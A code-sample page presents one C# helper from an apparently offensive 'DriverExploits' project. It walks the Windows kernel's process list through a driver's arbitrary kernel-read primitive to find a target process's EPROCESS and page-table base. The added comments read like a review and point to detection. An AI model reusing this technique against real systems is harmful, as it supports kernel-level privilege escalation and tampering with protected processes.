DriverExploits.ElevateHandle.FindKernelProcedure(string)

Here are the examples of the csharp api class DriverExploits.ElevateHandle.FindKernelProcedure(string) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.


1. Example

Project: loadlibrayy
Source File: ElevateHandle.cs
/// <summary>
/// Walks the kernel's process list through the driver's kernel-read primitive and returns the
/// context of the process whose PID equals <paramref name="targetProcessId"/>.
/// </summary>
/// <param name="targetProcessId">PID to look for; compared (widened to ulong) against the value read at g_OffsetProcessId.</param>
/// <returns>
/// A ProcessContext with ProcessId, DirectoryBase and KernelEntry set when a match is found;
/// otherwise ProcessId stays 0 and the other fields keep their defaults, so callers must check ProcessId.
/// </returns>
private static NT.ProcessContext FindProcessInfo(uint targetProcessId)
        {
            // ProcessId == 0 is the "not found" sentinel: it is only overwritten on a match below.
            NT.ProcessContext processContext = new NT.ProcessContext()
            {
                ProcessId = 0
            };

            // Resolve the exported PsInitialSystemProcess variable, which holds the address of the
            // System process's EPROCESS. NOTE(review): the result is dereferenced without a null/zero check.
            ulong eprocessPointer = (ulong)FindKernelProcedure("PsInitialSystemProcess");

            // Dereference it through the driver. Every kernel access in this routine goes via
            // Driver.ReadSystemAddress, i.e. the driver is relied on as an arbitrary kernel-read primitive;
            // that call pattern is the thing a detection or hardening review should focus on.
            ulong ntosEntry = Driver.ReadSystemAddress<ulong>(eprocessPointer);

            // LIST_ENTRY embedded in the System EPROCESS (presumably ActiveProcessLinks; the offset is the
            // version-specific g_OffsetProcessLinks -- a wrong offset silently reads unrelated memory).
            // Flink is at +0 and Blink at +sizeof(ulong), so lastLink is the link of the entry that
            // precedes System in the circular list.
            var listHead = ntosEntry + g_OffsetProcessLinks;
            var lastLink = Driver.ReadSystemAddress<ulong>(listHead + sizeof(ulong));

            // Follow Flink starting at the System entry. The loop ends when currentLink equals lastLink,
            // so the entry at lastLink itself is never examined (NOTE(review): the last process in the
            // list cannot be matched). There is no upper bound on the walk, so a corrupted or
            // mis-offset link is followed indefinitely.
            for (var currentLink = listHead; currentLink != lastLink; currentLink = Driver.ReadSystemAddress<ulong>(currentLink))
            {
                // CONTAINING_RECORD equivalent: from the embedded LIST_ENTRY back to the EPROCESS base.
                var currentEntry = currentLink - g_OffsetProcessLinks;

                var processId = Driver.ReadSystemAddress<ulong>(currentEntry + g_OffsetProcessId);
                
                // PID is a match (the uint parameter is implicitly widened to ulong here).
                if (processId == targetProcessId)
                {
                    processContext.ProcessId = targetProcessId;
                    // Value at g_OffsetDirectoryTable (presumably EPROCESS.DirectoryTableBase) and the
                    // EPROCESS address of the matched process.
                    processContext.DirectoryBase = Driver.ReadSystemAddress<ulong>(currentEntry + g_OffsetDirectoryTable);
                    processContext.KernelEntry = currentEntry;
                    break;
                }
            }

            return processContext;
        }